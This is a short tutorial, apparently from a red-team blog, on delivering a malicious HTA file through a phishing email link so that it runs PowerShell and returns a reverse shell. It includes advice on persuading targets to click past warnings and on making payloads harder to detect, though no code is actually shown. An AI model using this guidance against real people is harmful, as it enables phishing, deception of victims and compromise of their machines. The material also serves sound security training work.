Links: HTA Files

An HTML Application (HTA) Microsoft Windows program whose source consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.

In this example will be assuming that attachments are not allowed in our Emails, so we will need to send the user a Direct link which will bypass any Email Security and allow the user to download our payload. This attack can also be used as an attachment but we will skip attaching an HTA file and added directly onto our link so the browser knows what needs to be done once clicking the link.

Example:

I wrote a simple script which will automatically create me a simple HTA File that will execute a PowerShell code. It is very simple and will not bypass anything but in this example we did our work and can bypass anything.

HTA File which will execute a PowerShell Command

By saving this File into a HTA extension we can use this to send to our target and have it executed, remember these techniques needs User Execution/Interaction so giving them a reason on why these need to be open on your Phishing Email should be a good one.

We start a webserver and add this onto our Email with the File included.

This can be considered an attachment phishing technique the difference here is that our attachment contains no code for execution it just host our link

The target opens our file or Email which in the body it contains the Link, I put the Body of this email in an Attachment if you have noticed you can also use the attachment techniques to use Links as it's not that uncommon to use PDF files or other types of Documents that contain Links as References for other things.

Once the Target clicks on it, should receive prompts or Warning messages which we need a good excuse so the Target has these executed.

Once clicking Ok, the payload should execute with no issues on the Target Machine.

We see a warning on the Test.hta file that we try to execute, this needs to be downloaded and executed.

Then we successfully get a Reverse Shell on our Attacking Machine.

Ok , ok so you might be asking yourself, what's with ALL those warnings!!. Well Windows got more efficient in detecting these attacks and knows the common extensions in these payloads. It's efficient but we are using very simple techniques to mention, they are not Obfuscated, Encrypted or in any way using some Advanced method for Bypassing. Remember these are just small examples in the most basic matters and it's always good to do some research on how can you create more undetectable payloads.